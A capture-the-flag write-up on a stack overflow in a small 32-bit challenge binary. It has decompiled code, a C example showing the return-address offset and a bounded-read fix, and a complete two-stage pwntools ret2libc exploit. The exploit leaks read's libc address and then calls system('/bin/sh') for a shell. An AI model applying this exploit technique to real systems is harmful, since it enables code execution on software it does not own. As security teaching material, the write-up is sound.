32-bit dynamically linked ELF: no RELRO, no canary, no PIE.
The main function:
ssize_t __cdecl main()
{
    sub_80483F4();
    return write(1, "WIN\n", 4u);
}
And sub_80483F4:
ssize_t sub_80483F4()
{
    char buf[136]; // [esp+10h] [ebp-88h] BYREF
    return read(0, buf, 0x100u);
}
An obvious stack overflow: buf is 136 bytes, but read() accepts up to 0x100 (256) bytes. The binary imports read and write.
So the plan is: first use write to leak the address of read (from its GOT entry), return to main so the program runs again, then build a ROP chain on the second pass to get a shell.
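To make the numbers in the plan concrete, here is an added example (not part of the original writeup) that reproduces the shape of sub_80483F4 in C: it computes where the return address sits relative to buf on an i386 frame (buffer, then the 4-byte saved ebp), how many bytes a read of 0x100 can write past a 136-byte buffer, and shows the bounded read that would have closed the bug. The helper names, the pipe-fed test input and the NUL-terminating policy are my own choices, not the challenge binary's code.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUF_SIZE 136     /* sizeof(buf) in sub_80483F4 */
#define READ_LEN 0x100   /* length the binary passes to read() */

/* i386 frame layout assumed here: buf[136], saved ebp (4 bytes), return
 * address. Padding before the return address is therefore 136 + 4 = 0x8c. */
size_t ret_offset_i386(size_t buf_size) {
    return buf_size + 4;
}

/* Bytes that read() may write past the end of buf. */
size_t overflow_slack(size_t buf_size, size_t read_len) {
    return read_len > buf_size ? read_len - buf_size : 0;
}

/* Hardened replacement for the read in sub_80483F4: the length is derived
 * from the buffer instead of being a constant, and the result is
 * NUL-terminated (one byte reserved for the terminator). */
ssize_t read_bounded(int fd, char *buf, size_t buf_size) {
    if (buf == NULL || buf_size == 0)
        return -1;
    ssize_t n = read(fd, buf, buf_size - 1);
    if (n < 0)
        return -1;
    buf[n] = '\0';
    return n;
}

/* Constructed input: push `len` bytes of 'A' through a pipe and return how
 * many of them read_bounded() accepted into a BUF_SIZE-byte stack buffer. */
ssize_t demo_bounded_read(size_t len) {
    int fds[2];
    char src[READ_LEN];
    char buf[BUF_SIZE];
    ssize_t n;

    if (len > sizeof src)
        len = sizeof src;
    memset(src, 'A', sizeof src);
    if (pipe(fds) != 0)
        return -1;
    if (write(fds[1], src, len) != (ssize_t)len) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    close(fds[1]);               /* EOF so the read cannot block */
    n = read_bounded(fds[0], buf, sizeof buf);
    close(fds[0]);
    return n;
}

int main(void) {
    printf("return address offset from buf: 0x%zx\n", ret_offset_i386(BUF_SIZE));
    printf("bytes writable past buf: %zu\n", overflow_slack(BUF_SIZE, READ_LEN));
    printf("bounded read accepted %zd of %d bytes\n",
           demo_bounded_read(READ_LEN), READ_LEN);
    return 0;
}
```

The 0x8c from ret_offset_i386 is exactly the padding used in the exploit payloads, and the 120 bytes of slack is what lets the payload reach the saved ebp, the return address and the arguments behind it. With read_bounded the same 256-byte input is cut at 135 bytes and never touches the saved frame.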
The exploit:
from pwn import *

io = process('./ropasaurusrex')
elf = ELF('./ropasaurusrex')
libc = elf.libc
#libc = ELF('./libc.so.6')

write_plt = 0x804830C
read_got = 0x804961C
read_plt = 0x804832C
main_addr = 0x804841D
goal_addr = 0x8049700

# Stage 1: overwrite the return address with write@plt, return into main
# afterwards, and pass write(1, read@got, 4) to leak read's libc address.
payload = b'a' * 0x8c + p32(write_plt) + p32(main_addr)
payload += p32(1) + p32(read_got) + p32(4)
io.send(payload)

read_addr = u32(io.recv(4))
info('read_addr: 0x%x' % read_addr)
libc_base = read_addr - libc.symbols['read']
info('libc_base: 0x%x' % libc_base)
system_addr = libc_base + libc.symbols['system']
info('system_addr: 0x%x' % system_addr)
binsh_addr = libc_base + next(libc.search(b'/bin/sh'))
info('binsh_addr: 0x%x' % binsh_addr)

# Stage 2: main has run again and sub_80483F4 is reading once more;
# return into system("/bin/sh") with main as the fake return address.
payload = b'a' * 0x8c + p32(system_addr) + p32(main_addr) + p32(binsh_addr)
io.send(payload)
io.interactive()